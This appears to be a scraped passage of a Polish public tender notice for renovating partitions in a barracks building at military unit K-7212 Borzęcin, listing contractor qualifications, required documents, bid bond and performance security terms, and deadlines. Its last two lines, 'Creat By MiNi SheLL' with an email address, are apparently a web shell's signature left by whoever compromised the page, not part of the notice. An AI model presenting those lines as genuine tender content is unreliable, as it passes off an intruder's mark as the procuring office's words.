zamówienia, dat wykonania i podmiotów na rzecz, których roboty budowlane zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane zgodnie z zasadami sztuki budowlanej lub są wykonywane należycie. Wymagane max. 2 roboty budowlane o łącznej wartości 250 000,00 zł.<br/>Dowodami o których mowa, są referencje bądź inne dokumenty wystawione <br/>przez podmiot, na rzecz którego roboty budowlane były wykonane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane. Jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów składa swoje oświadczenie. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;<br/>b)	dysponuje lub będzie dysponować na okres realizacji zamówienia:<br/>-kierownikiem budowy (minimum 1 osoba) z uprawnieniami budowlanymi <br/>bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, posiadającym minimum 2-letnie doświadczenie w projektowaniu podobnych robót, która jest członkiem właściwej izby samorządu zawodowego,<br/>-kierownikiem robót elektrycznych (minimum 1 osoba) z uprawnieniami budowlanymi bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych posiadającym minimum 2-letnie doświadczenie w realizacji podobnych robót, która jest członkiem właściwej izby samorządu zawodowego.<br/>UWAGA:<br/>Przez uprawnienia do pełnienia samodzielnych funkcji w budownictwie Zamawiający rozumie uprawnienia wydane na podstawie aktualnie obowiązującej ustawy - Prawo budowlane /tj. Dz. U. z 2020 r. poz. 1333./ lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów albo odpowiednie kwalifikacje uzyskane za granicą, uznane w Polsce na podstawie przepisów o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej /tj. Dz. U. z 2020.o.220./.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) warunek dotyczący posiadanych zdolności technicznych lub zawodowych, o którym mowa powyżej – musi spełniać przynajmniej jeden z Wykonawców w pełni samodzielnie.<br/>3.	Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację przedmiotu zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących oświadczeń lub dokumentów:<br/>1)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>2)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>3)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 5 do SWZ.<br/>UWAGA: W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum, spółka cywilna), dokumenty, o których mowa w ppkt 1), 2) i 3) składane będą przez każdego partnera konsorcjum/ wspólnika spółki cywilnej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących oświadczeń lub dokumentów:<br/>1) wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych robót budowlanych, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem wartości przedmiotu zamówienia, dat wykonania i podmiotów na rzecz, których roboty budowlane zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane zgodnie z zasadami sztuki budowlanej lub są wykonywane należycie. Wymagane max 2 roboty budowlane o łącznej wartości 250 000,00 zł. Dowodami o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane. Jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów składa swoje oświadczenie. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Wzór wykazu stanowi Załącznik nr 6 do SWZ; <br/>2)	kserokopia uprawnień budowlanych - wymagane jest wykazanie przez Wykonawcę, że dysponuje lub będzie dysponować na okres realizacji zamówienia: <br/>- kierownikiem budowy (minimum 1 osoba) z uprawnieniami budowlanymi bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, posiadającym minimum 2-letnie doświadczenie w projektowaniu podobnych robót, która jest członkiem właściwej izby samorządu zawodowego,<br/>- kierownikiem robót elektrycznych (minimum 1 osoba) z uprawnieniami budowlanymi bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych posiadającym minimum 2-letnie doświadczenie w realizacji podobnych robót, która jest członkiem właściwej izby samorządu zawodowego<br/>Przez uprawnienia do pełnienia samodzielnych funkcji w budownictwie Zamawiający rozumie uprawnienia wydane na podstawie aktualnie obowiązującej ustawy - Prawo budowlane /tj. Dz. U. z 2020 r. poz. 1333./ lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów albo odpowiednie kwalifikacje uzyskane za granicą, uznane w Polsce na podstawie przepisów o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej /tj. Dz. U. z 2020.o.220./.<br/>3)	aktualne zaświadczenie o przynależności do Izby Samorządu Zawodowego osoby posiadającej uprawnienia budowlane;<br/>4)	oświadczenie Wykonawcy dotyczące doświadczenia osoby (osób) kierującej/ych robotami budowlanymi. Wzór wykazu stanowi Załącznik nr 9 do SWZ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Ofertę składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem kwalifikowanym, podpisem zaufanym lub podpisem osobistym.<br/>2.	Dokumenty, które Wykonawca zobowiązany jest złożyć wraz z ofertą: <br/>1)	formularz ofertowy – zgodnie z Załącznikiem nr 3 do SWZ; <br/>2)	oświadczenie Wykonawcy, o którym mowa w Rozdziale XI ust. 1 SWZ – zgodnie z Załącznikiem nr 4 do SWZ;<br/>3)	zobowiązanie innego podmiotu, o którym mowa w Rozdziale XII ust. 2 SWZ – zgodnie z Załącznikiem nr 7 do SWZ (jeżeli dotyczy);<br/>4)	dowód wniesienia wadium;<br/>5)	dokumenty, z których wynika prawo do podpisania oferty (odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru); 6) odpowiednie pełnomocnictwa (jeżeli dotyczy); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 3 425,80 zł (słownie: trzy tysiące czterysta dwadzieścia pięć zł 80/100);<br/>2.	Wadium wnosi się przed upływem terminu składania ofert.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu; <br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości /Dz. U. z 2020 r. poz. 299/.<br/>Wadium w formie pieniądza należy wnieść przelewem na konto w Banku NBP o/o Warszawa nr rachunku 96 1010 1010 0136 2213 9120 0000 z dopiskiem „Wadium dotyczące – Remont przegród pomiędzy korytarzem i pomieszczeniami w budynku nr 3 - Koszarowy w K-7212 Borzęcin” <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Zamawiający żąda od Wykonawcy, którego oferta została wybrana wniesienia zabezpieczenia należytego wykonania umowy zwanego dalej zabezpieczeniem w wysokości 5% wartości umowy brutto podanej w ofercie.<br/>2.	Zabezpieczenie, o którym mowa ma za zadanie zagwarantować zgodne z umową wykonanie zamówienia oraz służy do pokrycia wszystkich spornych i bezspornych roszczeń Zamawiającego z tytułu niewykonania lub nienależytego wykonania przedmiotu umowy. Jeżeli Wykonawca jest jednocześnie Gwarantem, zabezpieczenie służy także pokryciu roszczeń z tytułu gwarancji jakości.<br/>3.	Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:<br/>1)	pieniądzu – konto bankowe Zamawiającego: Narodowy Bank Polski Oddział Okręgowy Warszawa Nr konta 28 1010 1010 0136 2213 9120 2000 z dopiskiem: Remont przegród pomiędzy korytarzem i pomieszczeniami w budynku nr 3- Koszarowy w K-7212 Borzęcin – 26/TP/2021;<br/>1)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości /t. j. Dz. U. z 2018 r., poz. 110 ze zm./.<br/>4.	Wykonawca wnosi zabezpieczenie podzielone na dwie części: <br/>1)	30% wartości zabezpieczenia<br/>2)	70% wartości zabezpieczenia.<br/>5.	Zabezpieczenie wnoszone w formie gwarancji bankowej lub gwarancji ubezpieczeniowej musi posiadać zapis, że gwarant podejmie się bezwarunkowo i nieodwołalnie wypłacenia Zamawiającemu wyżej wymienionej wysokości kwoty, płatnej po pierwszym otrzymaniu pisemnego żądania, bez konieczności jego uzasadnienia.<br/>6.	Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy wskazany przez Zamawiającego najpóźniej w dniu zawarcia umowy.<br/>7.	Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku bankowym. <br/>8.	Zamawiający zwraca zabezpieczenie wniesione w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy.<br/>9.	Zamawiający zwraca 70% zabezpieczenia w terminie 30 dni od dnia wykonania przedmiotu zamówienia i uznania go przez Zamawiającego za należycie wykonane.<br/>10.	Pozostała kwota w wysokości 30% zabezpieczenia służy pokryciu roszczeń Zamawiającego z tytułu rękojmi za wady lub gwarancji jakości.<br/>11.	Kwota, o której mowa w ust. 10, jest zwracana nie później niż w 15 dniu po upływie okresu rękojmi za wady lub gwarancji jakości. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Niedopuszczalna jest pod rygorem nieważności zmiana istotnych postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że:<br/>1)	Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub Specyfikacji Warunków Zamówienia poprzez określenie ich zakresu, charakteru oraz warunków wprowadzenia takich zmian, <br/>2)	wynikają one z zapisów art. 454 lub art. 455 ustawy prawo zamówień publicznych.<br/>2.	Strony dopuszczają możliwość nieistotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w formie aneksu z zachowaniem formy pisemnej pod rygorem nieważności takiej zmiany.<br/>3.	Zamawiający zastrzega sobie prawo zmiany sposobu wykonania przedmiotu zamówienia z powodu:<br/>1)	uzasadnionych zmian, których nie można było wcześniej przewidzieć;<br/>2)	z powodu okoliczności siły wyższej.<br/>4.	Fakt zaistnienia siły wyższej powinien być wykazany dokumentem pochodzącym <br/>od właściwego organu administracji publicznej, chyba że jej zaistnienie jest powszechnie znane.<br/>5.	Zamawiający przewiduje możliwość dokonania w szczególności następujących nieistotnych zmian, o których mowa w pkt. 2, w przypadku przekształceń podmiotowych po stronie Wykonawcy skutkujących następstwem prawnym, a także w przypadku zmiany adresu, nazwy Wykonawcy lub Zamawiającego, dopuszcza się zmiany w tym zakresie.<br/>6.	Zamawiający przewiduje możliwość zmiany wartości umowy spowodowanej zmianą stawki podatku od towaru i usług (VAT).<br/>7.	Zamawiający dopuszcza następujące zmiany w przypadku stwierdzenia, że okoliczności związane z wystąpieniem COVID-19 mogą wpłynąć na należyte wykonanie umowy, zgodnie z art. 455 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, w szczególności:<br/>1)	zmianę terminu wykonania umowy lub jej części, lub czasowe zawieszenie wykonywania umowy lub jej części, na okres nie dłuższy niż 30 dni od dnia odwołania stanu epidemicznego,<br/>2)	zmianę sposobu wykonywania dostaw, usług lub robót budowlanych.<br/>8.	Uzupełnianie, zmiany lub rozwiązanie niniejszej umowy dla swej ważności wymagają formy pisemnej, w postaci aneksu do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-15 09:50</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/42blsz/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-15 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający zaleca, aby Wykonawcy przed przystąpieniem do złożenia oferty dokonali wizji lokalnej obiektu (podstawa: art. 136 ust. 1 ustawy Prawo zamówień publicznych).<br/>2. Wykonawcy zainteresowani wizją lokalną zobowiązani są do wcześniejszego poinformowania osoby upoważnionej do kontaktów tj. p. Tomasz LINOWSKI nr tel. 261 511 722; p. Krzysztof SOLIS nr tel. 261 511 591.

Creat By MiNi SheLL
Email: jattceo@gmail.com